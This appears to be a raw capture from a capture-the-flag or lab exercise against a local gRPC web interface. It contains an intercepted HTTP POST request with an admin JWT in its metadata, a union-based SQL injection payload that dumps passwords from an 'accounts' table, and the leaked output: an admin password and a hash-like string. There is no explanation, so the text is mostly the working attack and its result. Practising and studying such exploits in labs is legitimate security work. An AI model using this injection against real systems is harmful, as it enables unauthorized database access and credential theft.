POST /invoke/SimpleApp.getInfo HTTP/1.1
Host: 127.0.0.1:36523
Content-Length: 193
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Type: application/json
Accept: */*
X-Requested-With: XMLHttpRequest
x-grpcui-csrf-token: IyKbC7ldP2vpKKptynefY3SJI_E8OjwcjcAuQZ4NHLQ
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:36523
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:36523/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _grpcui_csrf_token=IyKbC7ldP2vpKKptynefY3SJI_E8OjwcjcAuQZ4NHLQ
Connection: close

{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTE3NDY2NDJ9.-REt8EzuyA7kSGoqL-ycZA5xNHp_fqsSb-8QHXIQEOw"}],"data":[{"id":"184"}]}


0 union SELECT GROUP_CONCAT(password) from accounts;

admin,HereIsYourPassWord1431
fed492de07bb080f24cbd663f6ef71de



